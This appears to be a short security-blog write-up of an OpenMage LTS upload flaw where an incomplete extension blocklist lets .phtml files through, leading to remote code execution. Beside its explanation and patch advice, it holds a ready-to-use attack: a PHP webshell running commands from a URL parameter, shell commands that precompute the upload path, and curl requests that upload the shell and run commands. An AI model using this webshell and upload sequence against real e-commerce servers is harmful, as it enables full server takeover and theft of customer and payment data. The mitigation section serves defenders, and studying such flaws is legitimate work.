Listen to this Post
How the mentioned CVE works:
The vulnerability exists in the product custom option file upload handler. OpenMage LTS uses an incomplete blocklist (forbidden_extensions = php,exe) to reject dangerous files. This list misses many PHP-executable extensions like .phtml, .phar, .php3, .php4, .php5, .php7, and .pht. The upload logic (in `File.php` lines 230-237) applies an `ExcludeExtension` validator using only that short list, allowing the bypass. Files are stored in `media/custom_options/quote/` with a deterministic path: subdirectory from first two characters of the original filename, and filename = MD5(file contents) + original extension. Since the attacker controls both the filename prefix and the payload, the final URL can be precomputed. On servers where that directory permits script execution (e.g., Apache+PHP-FPM or misconfigured Nginx), uploading a `.phtml` webshell leads to Remote Code Execution. The root cause is missing the comprehensive `protected_extensions` blocklist defined elsewhere in `core/etc/config.xml` (php, php3, php4, php5, php7, pht, phtml, etc.). The vulnerable code does not fall back to that list, leaving a trivial bypass. Attackers can upload a webshell, compute its MD5 hash, and directly access the file via the precomputed URL to execute system commands.
dailycve form:
Platform: OpenMage LTS
Version: All prior LTS
Vulnerability: File extension bypass
Severity: Critical
date: 2026-04-21
Prediction: Q2 2026 patch
What Undercode Say:
Compute deterministic path for uploaded webshell
SHELL='<?php echo exec("id"); system($_GET["cmd"]??"id"); ?>'
HASH=$(echo -n "$SHELL" | md5sum | cut -d' ' -f1)
PREFIX=$(echo "shell" | cut -c1-2 | sed 's/./&\//g' | tr -d '\n' | sed 's/\/$//')
URL="https://target.com/media/custom_options/quote/${PREFIX}/${HASH}.phtml"
echo "Precomputed URL: $URL"
Upload bypass using .phtml
curl -X POST "https://target.com/vulnerable_upload.php" \
-F "[email protected];filename=shell.phtml"
Execute command
curl "$URL?cmd=whoami"
Exploit:
1. Craft `.phtml` webshell.
2. Upload via product custom option file field.
3. Compute MD5 of shell content.
4. Access `media/custom_options/quote/s/h/.phtml`.
5. Append `?cmd=id` to achieve RCE.
Protection from this CVE
- Update OpenMage LTS to patched version (>=20.0.23).
- Manually extend `forbidden_extensions` to include
phtml,phar,php3,php4,php5,php7,pht. - Configure `media/custom_options/quote/` to disable script execution (e.g., `.htaccess` with `php_flag engine off` or Nginx
location ~ \.php$ { return 403; }). - Use a Web Application Firewall to block known malicious extensions.
Impact:
- Remote Code Execution (full server compromise)
- Data exfiltration (database credentials, customer PII, payment data)
- Lateral movement to internal infrastructure
- Supply chain attack via malicious code injection
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

